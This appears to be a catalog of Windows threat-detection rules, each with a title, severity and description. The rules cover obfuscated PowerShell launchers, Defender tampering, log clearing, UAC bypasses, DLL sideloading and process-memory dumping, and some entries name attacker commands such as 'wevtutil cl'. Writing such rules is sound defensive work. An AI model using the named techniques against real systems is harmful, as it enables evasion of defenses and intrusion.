Invoke-Obfuscation Obfuscated IEX Invocation - SecurityhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
Invoke-Obfuscation STDIN+ Launcher - SecurityhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - SecurityhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - SecuritymediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - SecuritymediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - SecurityhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip - SecurityhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - SecurityhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - SecurityhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - SecurityhighDetects Obfuscated Powershell via VAR++ LAUNCHER
NetNTLM Downgrade AttackhighDetects NetNTLM downgrade attack
New or Renamed User Account with '$' CharactermediumDetects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
RDP over Reverse SSH Tunnel WFPhighDetects svchost hosting RDP termsvcs communicating with the loopback address
Service Registry Key Read Access RequestlowDetects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
Potential Secure Deletion with SDeletemediumDetects files that have extensions commonly seen while SDelete is used to wipe files.
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Password Protected ZIP File OpenedmediumDetects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
Password Protected ZIP File Opened (Suspicious Filenames)highDetects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
Password Protected ZIP File Opened (Email Attachment)highDetects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
Unauthorized System Time ModificationlowDetect scenarios where a potentially unauthorized application or user is modifying the system time.
Sysmon Channel Reference DeletionhighPotential threat actor tampering with Sysmon manifest and eventually disabling it
Potential Privileged System Service Operation - SeLoadDriverPrivilegemediumDetects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
Windows Defender Exclusion List ModifiedmediumDetects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
Windows Defender Exclusion DeletedmediumDetects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
Windows Defender Exclusion Registry Key - Write Access RequestedmediumDetects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
Potential Access Token AbusemediumDetects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".
Outgoing Logon with New CredentialslowDetects logon events that specify new credentials
Windows Filtering Platform Blocked Connection From EDR Agent BinaryhighDetects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.
Microsoft Defender Blocked from Loading Unsigned DLLhighDetects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL
Unsigned Binary Loaded From Suspicious LocationhighDetects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
Sysmon Application CrashedhighDetects application popup reporting a failure of the Sysmon service
NTLMv1 Logon Between Client and ServermediumDetects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
DHCP Server Error Failed Loading the CallOut DLLhighThis rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
DHCP Server Loaded the CallOut DLLhighThis rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
Eventlog ClearedmediumOne of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
Important Windows Eventlog ClearedhighDetects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
Windows Defender Threat Detection Service DisabledmediumDetects when the "Windows Defender Threat Protection" service is disabled.
Invoke-Obfuscation CLIP+ Launcher - SystemhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - SystemhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
Invoke-Obfuscation STDIN+ Launcher - SystemhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - SystemhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - SystemmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation Via Stdin - SystemhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation RUNDLL LAUNCHER - SystemmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Clip - SystemhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - SystemhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - SystemhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - SystemhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Important Windows Service Terminated With ErrorhighDetects important or interesting Windows services that got terminated for whatever reason
Windows Service Terminated With ErrorlowDetects Windows services that got terminated for whatever reason
Important Windows Service Terminated UnexpectedlyhighDetects important or interesting Windows services that got terminated unexpectedly.
Windows Defender Grace Period ExpiredhighDetects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
Windows Defender Exclusions AddedmediumDetects the Setting of Windows Defender Exclusions
Windows Defender Exploit Guard TamperhighDetects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"
Windows Defender Submit Sample Feature DisabledlowDetects disabling of the "Automatic Sample Submission" feature of Windows Defender.
Windows Defender Malware And PUA Scanning DisabledhighDetects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software
Windows Defender Malware Detection History DeletioninformationalWindows Defender logs when the history of detected infections is deleted.
Windows Defender Real-time Protection DisabledhighDetects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment
Windows Defender Real-Time Protection Failure/RestartmediumDetects issues with Windows Defender Real-Time Protection features
Win Defender Restored Quarantine FilehighDetects the restoration of files from the defender quarantine
Windows Defender Configuration ChangeshighDetects suspicious changes to the Windows Defender configuration
Microsoft Defender Tamper Protection TriggerhighDetects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
Windows Defender Virus Scanning Feature DisabledhighDetects disabling of the Windows Defender virus scanning feature
HackTool - CACTUSTORCH Remote Thread CreationhighDetects remote thread creation from CACTUSTORCH as described in references.
HackTool - Potential CobaltStrike Process InjectionhighDetects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
Remote Thread Creation Via PowerShell In Uncommon TargetmediumDetects the creation of a remote thread from a Powershell process in an uncommon target process
Rare Remote Thread Creation By Uncommon Source ImagehighDetects uncommon processes creating remote threads.
Remote Thread Created In Shell ApplicationmediumDetects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
Remote Thread Creation By Uncommon Source ImagemediumDetects uncommon processes creating remote threads.
Remote Thread Creation In Uncommon Target ImagemediumDetects uncommon target processes for remote thread creation
Remote Thread Creation Ttdinject.exe ProxyhighDetects a remote thread creation of Ttdinject.exe used as proxy
Creation Of a Suspicious ADS File Outside a Browser DownloadmediumDetects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers
Hidden Executable In NTFS Alternate Data StreammediumDetects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
Suspicious File Download From File Sharing Websites - File StreamhighDetects the download of suspicious file type from a well-known file and paste sharing domain
Unusual File Download From File Sharing Websites - File StreammediumDetects the download of suspicious file type from a well-known file and paste sharing domain
HackTool Named File Stream CreatedhighDetects the creation of a named file stream with the imphash of a well-known hack tool
Exports Registry Key To an Alternate Data StreamhighExports the target Registry key and hides it in the specified alternate data stream.
Unusual File Download from Direct IP AddresshighDetects the download of suspicious file type from URLs with IP
Potential Suspicious Winget Package InstallationhighDetects potential suspicious winget package installation from a suspicious source.
Potentially Suspicious File Download From ZIP TLDhighDetects the download of a file with a potentially suspicious extension from a .zip top level domain.
DNS Query Request By Regsvr32.EXEmediumDetects DNS queries initiated by "Regsvr32.exe"
WinDivert Driver LoadhighDetects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
File Creation Date Changed to Another YearhighAttackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
Potential PrintNightmare Exploitation AttempthighDetect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
EventLog EVTX File DeletedmediumDetects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
Exchange PowerShell Cmdlet History DeletedhighDetects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
Process Deletion of Its Own ExecutablemediumDetects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
IIS WebServer Access Logs DeletedmediumDetects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
PowerShell Console History Logs DeletedmediumDetects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
Prefetch File DeletedhighDetects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
TeamViewer Log File DeletedlowDetects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
Tomcat WebServer Logs DeletedmediumDetects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
File Deleted Via Sysinternals SDeletemediumDetects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
ADS Zone.Identifier Deleted By Uncommon ApplicationmediumDetects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
EVTX Created In Uncommon LocationmediumDetects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
Creation Of Non-Existent System DLLmediumDetects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
Files With System DLL Name In Unsuspected LocationsmediumDetects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Files With System Process Name In Unsuspected LocationsmediumDetects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.
Dynamic CSharp Compile ArtefactlowWhen C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
DLL Search Order Hijackig Via Additional Space in PathhighDetects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
Potentially Suspicious DMP/HDMP File CreationmediumDetects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
HackTool - Powerup Write Hijack DLLhighPowerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Potential Initial Access via DLL Search Order HijackingmediumDetects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
Malicious DLL File Dropped in the Teams or OneDrive FolderhighDetects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
Uncommon File Creation By Mysql Daemon ProcesshighDetects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.
Suspicious DotNET CLR Usage Log ArtifacthighDetects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.
Suspicious File Creation In Uncommon AppData FolderhighDetects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
SCR File Write EventmediumDetects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
OneNote Attachment File Dropped In Suspicious LocationmediumDetects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
Suspicious File Created Via OneNote ApplicationhighDetects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
.RDP File Created by Outlook ProcesshighDetects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments.
Publisher Attachment File Dropped In Suspicious LocationmediumDetects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
PSScriptPolicyTest Creation By Uncommon ProcessmediumDetects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
.RDP File Created By Uncommon ApplicationhighDetects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
Potential Winnti Dropper ActivityhighDetects files dropped by Winnti as described in RedMimicry Winnti playbook
PDF File Created By RegEdit.EXEhighDetects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
Self Extraction Directive File Created In Potentially Suspicious LocationmediumDetects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Windows Binaries Write Suspicious ExtensionshighDetects Windows executables that write files with suspicious extensions
Suspicious Creation with ColorcplhighOnce executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Created Files by Microsoft Sync CentermediumThis rule detects suspicious files created by Microsoft Sync Center (mobsync)
Suspicious Files in Default GPO FoldermediumDetects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Suspicious Double Extension FileshighDetects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
Suspicious Executable File CreationhighDetect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
Suspicious Get-Variable.exe CreationhighGet-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION StreammediumDetects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
Potential Homoglyph Attack Using Lookalike Characters in FilenamemediumDetects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
Legitimate Application Dropped ArchivehighDetects programs on a Windows system that should not write an archive to disk
Legitimate Application Dropped ExecutablehighDetects programs on a Windows system that should not write executables to disk
Legitimate Application Dropped ScripthighDetects programs on a Windows system that should not write scripts to disk
Suspicious LNK Double Extension File CreatedmediumDetects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Suspicious PROCEXP152.sys File Created In TMPmediumDetects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
Suspicious File Creation Activity From Fake Recycle.Bin FolderhighDetects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Potential File Extension Spoofing Using Right-to-Left OverridehighDetects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
Drop Binaries Into Spool Drivers Color FoldermediumDetects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
LiveKD Kernel Memory Dump File CreatedhighDetects the creation of a file that has the same name as the default LiveKD kernel memory dump.
LiveKD Driver CreationmediumDetects the creation of the LiveKD driver, which is used for live kernel debugging
LiveKD Driver Creation By Uncommon ProcesshighDetects the creation of the LiveKD driver by a process image other than "livekd.exe".
Potential Privilege Escalation Attempt Via .Exe.Local TechniquehighDetects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
UAC Bypass Using Consent and Comctl32 - FilehighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using .NET Code Profiler on MMChighDetects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using EventVwrhighDetects the pattern of a UAC bypass using Windows Event Viewer
UAC Bypass Using IDiagnostic Profile - FilehighDetects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - FilehighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - FilehighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using NTFS Reparse Point - FilehighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Abusing Winsat Path Parsing - FilehighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - FilehighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Creation of WerFault.exe/Wer.dll in Unusual FoldermediumDetects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - FilemediumDetects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
UEFI Persistence Via Wpbbin - FileCreationhighDetects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
Potentially Suspicious Self Extraction Directive File CreatedmediumDetects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple ini files and not PE binaries.
DLL Loaded From Suspicious Location Via Cmspt.EXEhighDetects cmstp loading "dll" or "ocx" files from suspicious locations
Amsi.DLL Loaded Via LOLBIN ProcessmediumDetects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
Potential Azure Browser SSO AbuselowDetects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
Suspicious Renamed Comsvcs DLL Loaded By Rundll32highDetects rundll32 loading a renamed comsvcs.dll to dump process memory
Load Of RstrtMgr.DLL By A Suspicious ProcesshighDetects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Load Of RstrtMgr.DLL By An Uncommon ProcesslowDetects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXEhighDetects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
Time Travel Debugging Utility Usage - ImagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Suspicious Volume Shadow Copy Vssapi.dll LoadhighDetects the image load of VSS DLL by uncommon executables
Potentially Suspicious Volume Shadow Copy Vsstrace.dll LoadmediumDetects the image load of VSS DLL by uncommon executables
Suspicious Volume Shadow Copy VSS_PS.dll LoadhighDetects the image load of vss_ps.dll by uncommon executables
HackTool - SharpEvtMute DLL LoadhighDetects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs
PowerShell Core DLL Loaded Via Office ApplicationmediumDetects PowerShell core DLL being loaded by an Office Product
Potential 7za.DLL SideloadinglowDetects potential DLL sideloading of "7za.dll"
Potential Antivirus Software DLL SideloadingmediumDetects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Potential appverifUI.DLL SideloadinghighDetects potential DLL sideloading of "appverifUI.dll"
Potential AVKkid.DLL SideloadingmediumDetects potential DLL sideloading of "AVKkid.dll"
Potential CCleanerDU.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL SideloadingmediumDetects potential DLL sideloading of "CCleanerReactivator.dll"
Potential Chrome Frame Helper DLL SideloadingmediumDetects potential DLL sideloading of "chrome_frame_helper.dll"
Potential DLL Sideloading Via ClassicExplorer32.dllmediumDetects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
Potential DLL Sideloading Via comctl32.dllhighDetects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential DLL Sideloading Using Coregen.exemediumDetect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Potential DLL Sideloading Of DBGCORE.DLLmediumDetects DLL sideloading of "dbgcore.dll"
System Control Panel Item Loaded From Uncommon LocationmediumDetects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
Potential DLL Sideloading Of DBGHELP.DLLmediumDetects potential DLL sideloading of "dbghelp.dll"
Potential DLL Sideloading Of DbgModel.DLLmediumDetects potential DLL sideloading of "DbgModel.dll"
Potential EACore.DLL SideloadinghighDetects potential DLL sideloading of "EACore.dll"
Potential Edputil.DLL SideloadinghighDetects potential DLL sideloading of "edputil.dll"
Potential System DLL Sideloading From Non System LocationshighDetects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Potential Goopdate.DLL SideloadingmediumDetects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXEmediumDetects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
Potential Iviewers.DLL SideloadinghighDetects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXEhighDetects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential Mfdetours.DLL SideloadingmediumDetects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Unsigned Mfdetours.DLL SideloadinghighDetects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
Potential DLL Sideloading Of MpSvc.DLLmediumDetects potential DLL sideloading of "MpSvc.dll".
Potential DLL Sideloading Of MsCorSvc.DLLmediumDetects potential DLL sideloading of "mscorsvc.dll".
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
Potential Python DLL SideLoadingmediumDetects potential DLL sideloading of Python DLL files.
Potential Rcdll.DLL SideloadinghighDetects potential DLL sideloading of rcdll.dll
Potential RjvPlatform.DLL Sideloading From Default LocationmediumDetects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
Potential RjvPlatform.DLL Sideloading From Non-Default LocationhighDetects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Potential RoboForm.DLL SideloadingmediumDetects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
Potential ShellDispatch.DLL SideloadingmediumDetects potential DLL sideloading of "ShellDispatch.dll"
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potential SmadHook.DLL SideloadinghighDetects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
Potential SolidPDFCreator.DLL SideloadingmediumDetects potential DLL sideloading of "SolidPDFCreator.dll"
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Fax Service DLL Search Order HijackhighThe Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Potential Vivaldi_elf.DLL SideloadingmediumDetects potential DLL sideloading of "vivaldi_elf.dll"
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential DLL Sideloading Via VMware XferhighDetects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
Potential Waveedit.DLL SideloadinghighDetects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Potential Mpclient.DLL SideloadinghighDetects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
Potential WWlib.DLL SideloadingmediumDetects potential DLL sideloading of "wwlib.dll"
Windows Spooler Service Suspicious Binary LoadinformationalDetect DLL Load from Spooler Service backup folder
DLL Load By System Process From Suspicious LocationsmediumDetects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Python Image Load By Non-Python ProcessmediumDetects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.
Unsigned DLL Loaded by Windows UtilitymediumDetects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
Suspicious Unsigned Thor Scanner ExecutionhighDetects loading and execution of an unsigned thor scanner binary.
UAC Bypass Using Iscsicpl - ImageLoadhighDetects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
UAC Bypass With Fake DLLhighAttempts to load dismcore.dll after dropping it
WMIC Loading Scripting LibrariesmediumDetects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
Network Connection Initiated By AddinUtil.EXEhighDetects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
